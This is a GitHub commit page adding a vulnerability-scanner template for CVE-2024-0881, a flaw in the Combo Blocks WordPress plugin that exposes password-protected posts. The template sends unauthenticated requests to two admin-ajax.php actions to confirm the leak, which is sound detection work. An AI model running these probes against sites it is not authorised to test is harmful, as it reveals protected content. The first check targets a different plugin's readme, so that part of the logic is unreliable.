Merge pull request #9686 from Kazgangap/block

add cve-2024-0881
patch-2
Ritik Chaddha 2024-05-07 18:50:27 +05:30 committed by GitHub
commit b21ab65e6e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 54 additions and 0 deletions

View File

@ -0,0 +1,54 @@
id: CVE-2024-0881
info:
name: Combo Blocks < 2.2.76 - Improper Access Control
author: Kazgangap
severity: medium
description: |
The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
reference:
- https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0881
classification:
cve-id: CVE-2024-0881
cwe-id: CWE-284
epss-score: 0.00043
epss-percentile: 0.08268
metadata:
verified: true
max-request: 3
publicwww-query: "/wp-content/plugins/user-meta/"
tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure
flow: http(1) && http(2)
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt'
matchers:
- type: word
internal: true
words:
- 'User Profile Builder'
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '{"html"'
- '"<div class='
- '"pagination":'
condition: and
- type: status
status:
- 200